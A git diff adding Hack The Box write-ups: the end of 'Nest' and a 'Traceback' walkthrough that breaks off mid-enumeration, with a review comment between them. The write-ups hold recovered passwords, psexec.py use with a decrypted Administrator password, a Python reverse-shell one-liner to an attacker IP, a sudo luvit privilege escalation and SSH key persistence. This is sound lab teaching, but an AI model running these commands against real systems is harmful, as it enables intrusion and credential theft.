+ → ls -lash Debug\ Mode\ Password.txt:Password
+ 4.0K -rw-r--r-- 1 nothing nothing 15 May 28 13:05 'Debug Mode Password.txt:Password'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → cat Debug\ Mode\ Password.txt:Password
+ WBQ201953D8w
+
+
+We're going to save it because we may need it later on. Let's download the xml file and binary from teh HQK folder:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Nest]
+ → smbclient -U c.smith //10.10.10.178/Users
+ Enter WORKGROUP\c.smith's password: xRxRxPANCAK3SxRxRx
+ Try "help" to get a list of possible commands.
+
+ smb: \> cd c.smith
+
+ smb: \c.smith\> cd "HQK Reporting"
+
+ smb: \c.smith\HQK Reporting\> ls
+ . D 0 Fri Aug 9 01:06:17 2019
+ .. D 0 Fri Aug 9 01:06:17 2019
+ AD Integration Module D 0 Fri Aug 9 14:18:42 2019
+ Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
+ HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\HQK Reporting\> get HQK_Config_Backup.xml
+ getting file \c.smith\HQK Reporting\HQK_Config_Backup.xml of size 249 as HQK_Config_Backup.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
+
+ smb: \c.smith\HQK Reporting\> cd "AD Integration Module"
+
+ smb: \c.smith\HQK Reporting\AD Integration Module\> ls
+ . D 0 Fri Aug 9 14:18:42 2019
+ .. D 0 Fri Aug 9 14:18:42 2019
+ HqkLdap.exe A 17408 Thu Aug 8 01:41:16 2019
+
+ 10485247 blocks of size 4096. 6543251 blocks available
+
+ smb: \c.smith\HQK Reporting\AD Integration Module\> get HqkLdap.exe
+ getting file \c.smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (98.8 KiloBytes/sec) (average 56.5 KiloBytes/sec)
+
+
+So here's what the xml file has:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → cat HQK_Config_Backup.xml
+ <****?xml version="1.0"?> <****ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <****Port>4386 <****/Port> <****QueryDirectory>C:\Program Files\HQK\ALL QUERIES <****/QueryDirectory> <****/ServiceSettings>%
+
+So here we get the configuration file for the service running on port 4386, let's try to connect to it using telnet:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → telnet 10.10.10.178 4386
+ Trying 10.10.10.178...
+ Connected to 10.10.10.178.
+ Escape character is '^]'.
+
+ HQK Reporting Service V1.2
+
+ >help
+
+ This service allows users to run queries against databases using the legacy HQK format
+
+ --- AVAILABLE COMMANDS ---
+
+ LIST
+ SETDIR <****Directory_Name>
+ RUNQUERY <****Query_ID>
+ DEBUG <****Password>
+ HELP <****Command>
+
+ >LIST
+
+ Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
+
+ QUERY FILES IN CURRENT DIRECTORY
+
+ [DIR] COMPARISONS
+ [1] Invoices (Ordered By Customer)
+ [2] Products Sold (Ordered By Customer)
+ [3] Products Sold In Last 30 Days
+
+ Current Directory: ALL QUERIES
+ >1
+
+ Unrecognised command
+ >RUNQUERY 1
+
+ Invalid database configuration found. Please contact your system administrator
+
+ Invalid database configuration found. Please contact your system administrator
+ >SETDIR C:\
+
+ Current directory set to C:
+ >DEBUG
+
+ Invalid number of arguments specified
+ >DEBUG WBQ201953D8w
+
+ Debug mode enabled. Use the HELP command to view additional commands that are now available
+
+And here you see that we needed the password from earlier to properly use the DEBUG command, now from here we get a few additional commands:
+
+
+ >HELP
+
+ This service allows users to run queries against databases using the legacy HQK format
+
+ --- AVAILABLE COMMANDS ---
+
+ LIST
+ SETDIR <****Directory_Name>
+ RUNQUERY <****Query_ID>
+ DEBUG <****Password>
+ HELP <****Command>
+ SERVICE
+ SESSION
+ SHOWQUERY <****Query_ID>
+
+We get access to the commands named **SERVICE** , **SESSION** , **SHOWQUERY**
+
+
+ >SERVICE
+
+ --- HQK REPORTING SERVER INFO ---
+
+ Version: 1.2.0.0
+ Server Hostname: HTB-NEST
+ Server Process: "C:\Program Files\HQK\HqkSvc.exe"
+ Server Running As: Service_HQK
+ Initial Query Directory: C:\Program Files\HQK\ALL QUERIES
+
+
+Here we get hinted towards the **C:\Program Files\HQK\** directory:
+
+
+ >SETDIR C:\Program Files\HQK
+
+ Current directory set to HQK
+ >LIST
+
+ Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
+
+ QUERY FILES IN CURRENT DIRECTORY
+
+ [DIR] ALL QUERIES
+ [DIR] LDAP
+ [DIR] Logs
+ [1] HqkSvc.exe
+ [2] HqkSvc.InstallState
+ [3] HQK_Config.xml
+
+ Current Directory: HQK
+
+
+
+Let's take a look at the LDAP directory:
+
+
+ >SETDIR LDAP
+
+ Current directory set to LDAP
+ >LIST
+
+ Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
+
+ QUERY FILES IN CURRENT DIRECTORY
+
+ [1] HqkLdap.exe
+ [2] Ldap.conf
+
+ Current Directory: LDAP
+
+ >SHOWQUERY 2
+
+ Domain=nest.local
+ Port=389
+ BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
+ User=Administrator
+ Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
+
+
+
+And here we get credentials! Although this is still an encrypted password for the Administrator User, Just like before we need the following arguements to decrypt it: **passphrase / saltvalue / passwordIterations / initVector / keySize** And to find those, we need to decompile the **HqkLdap.exe** binary and we can do it using [ILSpy](https://github.com/icsharpcode/ILSpy).
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/23 ] [~/HTB/Nest]
+ → git clone https://github.com/icsharpcode/ILSpy
+
+ [ 10.10.14.13/23 ] [ /dev/pts/23 ] [HTB/Nest/ILSpy]
+ → git submodule update --init --recursive
+ Submodule 'ILSpy-tests' (https://github.com/icsharpcode/ILSpy-tests) registered for path 'ILSpy-tests'
+ Cloning into '/home/nothing/HTB/Nest/ILSpy/ILSpy-tests'...
+ Submodule path 'ILSpy-tests': checked out 'aa8f1197e6a513bcc10bcc38ec7d2143d27a2246'
+
+
+
+And from there, you decompile the **HqkLdap.exe** binary file, and get the following parameters from the reversed code:
+
+
+ #passPhrase = **667912**
+ #saltValue = **1313Rf99**
+ #passwordIterations = **3**
+ #initVector = **1L1SA61493DRV53Z**
+ #keySize = **256**
+
+
+
+Just like before we change the decrypt.cs code to have the aforementionned values, and we decrypt the password:
+
+
+
+Then we compile it, and run it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → mcs decrypt.cs
+
+ [ 10.10.14.13/23 ] [ /dev/pts/1 ] [~/HTB/Nest]
+ → ./decrypt.exe
+ Plaintext: XtH4nkS4Pl4y1nGX
+
+
+And that's it ! We managed to get the Administrator password. So let's get onto the box using psexec.py:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → locate psexec.py
+ /home/nothing/HTB/Forest/impacket/build/scripts-3.9/psexec.py
+ /home/nothing/HTB/Forest/impacket/examples/psexec.py
+ /usr/local/bin/psexec.py
+ /usr/local/lib/python3.9/dist-packages/impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3.9.egg/EGG-INFO/scripts/psexec.py
+ /usr/share/doc/python3-impacket/examples/psexec.py
+ /usr/share/powershell-empire/lib/modules/powershell/lateral_movement/invoke_psexec.py
+ /usr/share/set/src/fasttrack/psexec.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/22 ] [~/HTB/Nest]
+ → python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:XtH4nkS4Pl4y1nGX@10.10.10.178
+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [*] Requesting shares on 10.10.10.178.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file xKwELIZm.exe
+ [*] Opening SVCManager on 10.10.10.178.....
+ [*] Creating service mWKI on 10.10.10.178.....
+ [*] Starting service mWKI.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 6.1.7601]
+ Copyright (c) 2009 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>systeminfo
+
+ Host Name: HTB-NEST
+ OS Name: Microsoft Windows Server 2008 R2 Standard
+ OS Version: 6.1.7601 Service Pack 1 Build 7601
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00477-179-0000007-84361
+ Original Install Date: 8/5/2019, 9:22:30 PM
+ System Boot Time: 5/28/2021, 7:32:37 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware Virtual Platform
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,546 MB
+ Virtual Memory: Max Size: 4,095 MB
+ Virtual Memory: Available: 3,653 MB
+ Virtual Memory: In Use: 442 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ Hotfix(s): 68 Hotfix(s) Installed.
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) PRO/1000 MT Network Connection
+ Connection Name: Local Area Connection
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.178
+ [02]: fe80::f144:55c1:5e8a:4cbd
+ [03]: dead:beef::f144:55c1:5e8a:4cbd
+ C:\Windows\system32>cd C:\Users\Administrator\Desktop
+
+ C:\Users\Administrator\Desktop>type root.txt
+ 65XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
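Review bot: the decrypt.cs listing (the `vim decrypt.cs` block) will not compile as pasted: `newRfc2898DeriveBytes(`, `newAesCryptoServiceProvider()`, `newMemoryStream(`, `newCryptoStream(`, `newbyte[`, `varplainText=` and `returnplainText;` all lost the space after the keyword, and the program writes `"PlainText: "` while the transcript shows `Plaintext:`, so the listing is not the file that was actually fed to `mcs`. Restore the spacing, e.g. `var password = new Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations);`, and make the printed label match the output. Missing documentation in Part 3: "we change the decrypt.cs code to have the aforementionned values" is followed by nothing; the changed `Decrypt(...)` call with the five parameters recovered from HqkLdap.exe should be shown, since those parameters are the whole point of the ILSpy step. Accuracy: the `allinfo "Debug Mode Password.txt"` output does not show "file attributes" holding the password; `attributes: A (20)` is the attribute, and the 15 bytes live in the named alternate data stream `[:Password:$DATA]`, which is why `get "Debug Mode Password.txt:Password"` works while the file itself is 0 bytes. It is also worth one sentence telling the reader why the decryption is possible at all: the passphrase, salt, iteration count and IV are constants in the shipped code (`Encrypt(..., "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)`), so anyone holding the binary can reverse the "encrypted" credentials; that, not the cipher, is the finding. Typos: "teh", "aforementionned", "arguements", "sourcecode"; the `<****?xml` and `<****Directory_Name>` escapes in the `cat` and `telnet` transcripts render badly and should sit in a fenced block so `<` survives as-is.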
diff --git a/Easy/43.md b/Easy/43.md
new file mode 100644
index 0000000..c49ad48
--- /dev/null
+++ b/Easy/43.md
@@ -0,0 +1,494 @@
+# Traceback Writeup
+
+
+
+## Introduction :
+
+Traceback is an easy linux box released back in march 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → nmap -vvv -p- 10.10.10.181 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.181
+ Discovered open port 22/tcp on 10.10.10.181
+
+ [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback]
+ → nmap -sCV -p80,22 10.10.10.181
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 22:24 CEST
+ Nmap scan report for 10.10.10.181
+ Host is up (0.033s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
+ | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
+ |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Help us
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80, so let's investigate it:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://10.10.10.181/
+
+
+We can run a gobuster scan but it doesn't help us, so let's investigate further:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → curl 10.10.10.181
+
+
+
+
+
+ # This site has been owned
+
+
+
+
+ ## I have left a backdoor for all the net. FREE INTERNETZZZ
+
+
+
+
+ ### - Xh4H -
+
+
+ <****!--Some of the best web shells that you might need ;)--****>
+
+
+
+
+As we curl the website's sourcecode, we see a comment **'Some of the best web shells you might need'** , if we look for this comment on github we find the following repository:
+
+
+
+And so we know what are the php files on this webserver, and we can save them in a textfile:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → cat files.txt
+ alfa3.php
+ alfav3.0.1.php
+ andela.php
+ bloodsecv4.php
+ by.php
+ c99ud.php
+ cmd.php
+ configkillerionkros.php
+ jspshell.jspmini.php
+ obfuscated-punknopass.php
+ punk-nopass.php
+ punkholic.php
+ r57.php
+ smevk.php
+ wso2.8.5.php
+
+
+
+So we run our gobuster scan with our textfile:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → gobuster dir -u http://10.10.10.181 -w files.txt
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.181
+ [+] Method: GET
+ [+] Threads: 10
+ [+] Wordlist: files.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/29 09:57:50 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /smevk.php (Status: 200) [Size: 1261]
+
+ ===============================================================
+ 2021/05/29 09:57:50 Finished
+ ===============================================================
+
+
+
+So let's investigate the page we found :
+
+
+
+We login with the default credentials **admin:admin** , which leads us to one of the worst looking php shells of all time:
+
+
+
+And we can execute commands as the webadmin user, and we can use python3 to get a reverse shell:
+
+
+ $ which python3
+ /usr/bin/python3
+
+ $ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' &
+
+
+
+And then we simply catch the incoming reverse shell connection on our port 9001:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.181] 54782
+ bash: cannot set terminal process group (680): Inappropriate ioctl for device
+ bash: no job control in this shell
+ webadmin@traceback:/var/www/html$ id
+ id
+ uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
+ webadmin@traceback:/var/www/html$ ls
+ ls
+ bg.jpg
+ index.html
+ smevk.php
+ webadmin@traceback:/var/www/html$
+
+
+And we get a shell as the webadmin user!
+
+
+ webadmin@traceback:/var/www/html$ ls ~
+ ls ~
+ note.txt
+
+ webadmin@traceback:/var/www/html$ cd ~
+ cd ~
+ webadmin@traceback:/home/webadmin$ ls -lash
+ ls -lash
+ total 44K
+ 4.0K drwxr-x--- 5 webadmin sysadmin 4.0K Apr 22 06:08 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Aug 25 2019 ..
+ 4.0K -rw------- 1 webadmin webadmin 105 Mar 16 2020 .bash_history
+ 4.0K -rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
+ 4.0K -rw-r--r-- 1 webadmin webadmin 3.7K Aug 23 2019 .bashrc
+ 4.0K drwx------ 2 webadmin webadmin 4.0K Aug 23 2019 .cache
+ 4.0K drwxrwxr-x 3 webadmin webadmin 4.0K Apr 22 06:08 .local
+ 4.0K -rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
+ 4.0K -rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
+ 4.0K drwxrwxr-x 2 webadmin webadmin 4.0K Feb 27 2020 .ssh
+ 4.0K -rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 2020 note.txt
+
+ webadmin@traceback:/var/www/html$ cat ~/note.txt
+ cat ~/note.txt
+ - sysadmin -
+ I have left a tool to practice Lua.
+ I'm sure you know where to find it.
+ Contact me if you have any question.
+
+
+As we take a look around, we see that the sysadmin left a 'tool to practice lua' so let's take a look at what the user can do:
+
+
+ webadmin@traceback:/home/webadmin$ sudo -l
+ sudo -l
+ Matching Defaults entries for webadmin on traceback:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User webadmin may run the following commands on traceback:
+ (sysadmin) NOPASSWD: /home/sysadmin/luvit
+
+
+Here we see that we have access to the luvit binary, which can be executed as sysadmin with no password. We also take a look at the user's history:
+
+
+ webadmin@traceback:/home/webadmin$ history
+ history
+ 1 ls -la
+ 2 sudo -l
+ 3 nano privesc.lua
+ 4 sudo -u sysadmin /home/sysadmin/luvit privesc.lua
+ 5 rm privesc.lua
+ 6 logout
+ 7 id
+ 8 ls
+ 9 ls ~
+ 10 cat ~/note.txt
+ 11 cd ~
+ 12 ls -lash
+ 13 sudo -l
+ 14 history
+
+
+And here you see why this box is called Traceback, the hacker didn't remove the traces of their presence, and thus we see that they were using a file called privesc.lua in alongside the the /home/sysadmin/luvit binary. So let's see what they were trying to do after we upgrade our reverse shell to a fully interactive one:
+
+
+ webadmin@traceback:/home/webadmin$ tty
+ tty
+ not a tty
+ webadmin@traceback:/home/webadmin$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ webadmin@traceback:/home/webadmin$ ^Z #this means CTRL+Z
+ [1] + 3346006 suspended nc -lvnp 9001
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → stty raw -echo ; fg
+ [1] + 3346006 continued nc -lvnp 9001
+ webadmin@traceback:/home/webadmin$ export TERM=screen-256color
+ webadmin@traceback:/home/webadmin$ export SHELL=bash
+ webadmin@traceback:/home/webadmin$ stty rows 40 columns 125
+ webadmin@traceback:/home/webadmin$ reset
+
+
+So we can use the luvit binary to run lua code as the sysadmin user, so let's spawn a shell with it:
+
+
+ webadmin@traceback:/home/webadmin$ nano priv.lua
+
+ require('os');
+ os.execute('/bin/bash');
+
+ CTRL+S CTRL+X
+
+ webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit ./priv.lua
+ sysadmin@traceback:/home/webadmin$ id
+ uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
+ sysadmin@traceback:/home/webadmin$ cd ~
+ sysadmin@traceback:~$ ls
+ luvit user.txt
+ sysadmin@traceback:~$ cat user.txt
+ 08XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the sysadmin user, and print the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now we don't want to do all these steps to get a shell as the sysadmin user, so we're going to add our ssh public key to ssh directly as the sysadmin user:
+
+
+ sysadmin@traceback:~$ stty rows 80 columns 200
+ sysadmin@traceback:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere' >> ~/.ssh/authorized_keys
+
+ sysadmin@traceback:~$ exit
+ exit
+ webadmin@traceback:/home/webadmin$ exit
+ exit
+ webadmin@traceback:/home/webadmin$ exit
+ exit
+ %
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → exit
+
+
+Then ssh as the sysadmin user with the associated private key:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Traceback]
+ → ssh sysadmin@10.10.10.181 -i ~/.ssh/id_ed25519
+ The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established.
+ ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts.
+ #################################
+ -------- OWNED BY XH4H ---------
+ - I guess stuff could have been configured better ^^ -
+ #################################
+
+ Welcome to Xh4H land
+
+
+
+ Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2
+ $ bash
+ sysadmin@traceback:~$ id
+ uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
+
+
+Now in order to privesc to the root user, we need to monitor the processes that are running on the server, especially if there are any that are being run regularly by the root user, and to do so we can use [pspy](https://github.com/DominicBreuker/pspy):
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback]
+ → wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
+ --2021-05-29 10:45:10-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-9594-737e4ba5e6fe?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20210529%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20210529T084505Z&X-Amz-Expires;=300&X-Amz-Signature;=ef1682d371721693120b61f6e0d48ee367f1f0008248f94748c01642371207f1&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=120821432&response-content-disposition;=attachment%3B%20filename%3Dpspy64s&response-content-type;=application%2Foctet-stream [following]
+ --2021-05-29 10:45:10-- https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-9594-737e4ba5e6fe?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20210529%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20210529T084505Z&X-Amz-Expires;=300&X-Amz-Signature;=ef1682d371721693120b61f6e0d48ee367f1f0008248f94748c01642371207f1&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=120821432&response-content-disposition;=attachment%3B%20filename%3Dpspy64s&response-content-type;=application%2Foctet-stream
+ Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.108.154, 185.199.110.154, 185.199.111.154, ...
+ Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.108.154|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 1156536 (1.1M) [application/octet-stream]
+ Saving to: ‘pspy64s’
+
+ pspy64s 100%[=====================================================================================================================================================>] 1.10M 3.50MB/s in 0.3s
+
+ 2021-05-29 10:45:11 (3.50 MB/s) - ‘pspy64s’ saved [1156536/1156536]
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ sysadmin@traceback:~$ which curl wget
+ /usr/bin/wget
+
+ sysadmin@traceback:~$ wget http://10.10.14.13:9090/pspy64s -O /dev/shm/pspy
+ --2021-05-29 01:54:04-- http://10.10.14.13:9090/pspy64s
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 1156536 (1.1M) [application/octet-stream]
+ Saving to: ‘/dev/shm/pspy’
+
+ /dev/shm/pspy 100%[=====================================================================================================================================================>] 1.10M 312KB/s in 3.5s
+
+ 2021-05-29 01:54:07 (321 KB/s) - ‘/dev/shm/pspy’ saved [1156536/1156536]
+
+ sysadmin@traceback:~$ chmod +x /dev/shm/pspy
+ sysadmin@traceback:~$ /dev/shm/pspy
+ pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
+
+
+ ██▓███ ██████ ██▓███ ▓██ ██▓
+ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
+ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
+ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
+ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
+ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
+ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
+ ░░ ░ ░ ░ ░░ ▒ ▒ ░░
+ ░ ░ ░
+ ░ ░
+
+ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
+ Draining file system events due to startup...
+ done
+
+ [...]
+
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1310 | /dev/shm/pspy
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1305 | sleep 30
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1304 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1302 | /usr/sbin/CRON -f
+ 2021/05/29 01:54:21 CMD: UID=0 PID=13 |
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1236 | bash
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1226 | -sh
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1224 | sshd: sysadmin@pts/0
+ 2021/05/29 01:54:21 CMD: UID=0 PID=121 |
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1200 | (sd-pam)
+ 2021/05/29 01:54:21 CMD: UID=0 PID=12 |
+ 2021/05/29 01:54:21 CMD: UID=1001 PID=1199 | /lib/systemd/systemd --user
+ 2021/05/29 01:54:21 CMD: UID=0 PID=1197 | sshd: sysadmin [priv]
+ 2021/05/29 01:54:31 CMD: UID=0 PID=1323 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
+
+ [...]
+
+
+
+
+Here we see that the UID 0 (the root user) runs the **cp** command from **/var/backups/.update-motd.d/** to the **/etc/update-motd.d/** directory.
+
+
+ sysadmin@traceback:~$ ls -lash /etc/update-motd.d/
+ total 32K
+ 4.0K drwxr-xr-x 2 root sysadmin 4.0K Apr 22 06:08 .
+ 4.0K drwxr-xr-x 80 root root 4.0K Apr 22 06:08 ..
+ 4.0K -rwxrwxr-x 1 root sysadmin 981 May 29 01:58 00-header
+ 4.0K -rwxrwxr-x 1 root sysadmin 982 May 29 01:58 10-help-text
+ 8.0K -rwxrwxr-x 1 root sysadmin 4.2K May 29 01:58 50-motd-news
+ 4.0K -rwxrwxr-x 1 root sysadmin 604 May 29 01:58 80-esm
+ 4.0K -rwxrwxr-x 1 root sysadmin 299 May 29 01:58 91-release-upgrade
+ sysadmin@traceback:~$ cat /etc/update-motd.d/00-header
+ #!/bin/sh
+ #
+ # 00-header - create the header of the MOTD
+ # Copyright (C) 2009-2010 Canonical Ltd.
+ #
+ # Authors: Dustin Kirkland <****kirkland@canonical.com>
+ #
+ # This program is free software; you can redistribute it and/or modify
+ # it under the terms of the GNU General Public License as published by
+ # the Free Software Foundation; either version 2 of the License, or
+ # (at your option) any later version.
+ #
+ # This program is distributed in the hope that it will be useful,
